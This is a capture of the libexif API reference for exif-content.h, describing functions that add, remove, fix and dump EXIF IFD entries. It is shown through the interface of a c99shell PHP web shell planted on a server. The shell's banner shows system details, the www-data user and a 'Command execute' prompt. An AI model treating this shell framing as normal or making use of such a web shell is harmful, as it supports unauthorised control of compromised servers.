Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/libexif-doc/libexif-api.html/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
exif-content.h File Reference Handling EXIF IFDs. More... #include <libexif/exif-tag.h>#include <libexif/exif-entry.h>#include <libexif/exif-data.h>#include <libexif/exif-log.h>#include <libexif/exif-mem.h>Go to the source code of this file.
Detailed DescriptionHandling EXIF IFDs. Macro Definition Documentation◆ exif_content_get_value
Value:
(exif_content_get_entry (c,t) ? \
exif_entry_get_value (exif_content_get_entry (c,t),v,m) : NULL)
Return a textual representation of the EXIF data for a tag.
Function Documentation◆ exif_content_add_entry()
Add an EXIF tag to an IFD. If this tag already exists in the IFD, this function does nothing.
References exif_content_get_entry(), _ExifEntry::parent, and _ExifEntry::tag. ◆ exif_content_dump()
Dump contents of the IFD to stdout. This is intended for diagnostic purposes only.
References exif_entry_dump(). Referenced by exif_data_dump(). ◆ exif_content_fix()
Fix the IFD to bring it into specification. Call exif_entry_fix on each entry in this IFD to fix existing entries, create any new entries that are mandatory in this IFD but do not yet exist, and remove any entries that are not allowed in this IFD.
References exif_content_foreach_entry(), exif_content_get_ifd(), exif_data_get_data_type(), exif_tag_table_count(), and _ExifContent::parent. ◆ exif_content_foreach_entry()
Executes function on each EXIF tag in this IFD in turn. The tags will not necessarily be visited in numerical order.
Referenced by exif_content_fix(). ◆ exif_content_get_entry()
Return the ExifEntry in this IFD corresponding to the given tag. This is a pointer into a member of the ExifContent array and must NOT be freed or unrefed by the caller.
References _ExifEntry::tag. Referenced by exif_content_add_entry(). ◆ exif_content_get_ifd()
Return the IFD number in which the given ExifContent is found.
References _ExifContent::parent. Referenced by exif_content_fix(). ◆ exif_content_log()
Set the log message object for this IFD.
◆ exif_content_remove_entry()
Remove an EXIF tag from an IFD. If this tag does not exist in the IFD, this function does nothing.
References _ExifEntry::parent. ExifEntry * exif_content_get_entry(ExifContent *content, ExifTag tag) Return the ExifEntry in this IFD corresponding to the given tag. Definition: exif-content.c:196 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]-- |